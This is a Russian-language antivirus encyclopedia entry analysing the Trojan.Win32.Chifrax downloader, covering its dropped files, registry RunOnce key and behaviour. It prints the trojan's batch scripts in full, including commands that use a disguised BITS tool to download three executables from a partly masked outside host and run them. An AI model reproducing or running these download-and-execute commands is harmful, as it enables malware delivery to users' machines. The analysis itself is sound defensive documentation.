Trojan.Win32.Chifrax

Дата обнаружения 01/04/2010
Класс Trojan
Платформа Win32
Описание

После запуска троянец выполняет следующие действия:

  • извлекает из своего тела файлы, которые сохраняются в каталоге хранения временных файлов текущего пользователя как
    %Temp%IXP000.TMPlsass.exe (118784 байта)
    %Temp%IXP000.TMPw.bat (49 байт)
    
    

    Сценарий содержит следующие строки:

    @echo off
    %SystemRoot%System32cmd.exe /C r.bat
    %Temp%IXP000.TMPr.bat (567 байт)
    
    

    Сценарий содержит следующие строки:

    
    @echo off
    ren lsass lsass.exe
    start "" "sony.vegas.pro.80b.build.217-nope.exe"
    net start bits
    IF NOT EXIST C:nul mkdir C:
    lsass.exe /transfer jman /download /priority high 
    http://bulg***ave.com/ic3.exe "C:ecic3.exe"
    
    IF NOT EXIST C:nul mkdir C:
    lsass.exe /transfer jman /download /priority high 
    http://bulg***ave.com/IC.exe "C:exic.exe"
    
    IF NOT EXIST C:nul mkdir C:
    lsass.exe /transfer jman /download /priority high 
    http://bulg***ave.com/db.exe "C:exdb.exe"
    
    start "" "C:ecic3.exe"
    
    start "" "C:exic.exe"
    
    start "" "C:exdb.exe"
    
    %Temp%IXP000.TMPsony.vegas.pro.80b.build.217-nope.exe (69521 байт)
    
    
  • Создает ключ системного реестра:
    
    [HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnce]
    
    
    
    "wextract_cleanup0" = "rundll32.exe %System%advpack.dll,
    DelNodeRunDLL32 "%Temp%IXP000.TMP""
    
    
    
    

    Таким образом, при следующем старте системы каталог «%Temp%IXP000.TMP» будет удален.

  • Запускает на выполнение ранее созданный сценарий «w.bat», в свою очередь запускающий «r.bat».

После этого троянец завершает свою работу.

Запуск сценария «r.bat» приводит к выполнению следующих действий:

  • запускается на выполнение файл «sony.vegas.pro.80b.build.217-nope.exe».
  • При помощи созданного троянцем файла «lsass.exe» из сети Интернет загружаются файлы по следующим ссылкам:
    
    http://bulg***ave.com/ic3.exe
    
    
    
    http://bulg***ave.com/IC.exe
    
    
    
    http://bulg***ave.com/db.exe
    
    
    
    

    Загруженные файлы сохраняются в корневом каталоге диска C: соответственно под следующими именами:

    
    C:ecic3.exe
    
    
    
    C:exic.exe
    
    
    
    C:exdb.exe
    
    
    
    

    На момент создания описания по всем приведенным ссылкам загружалась html-страница следующего содержания:

  • Загруженные файлы запускаются на выполнение.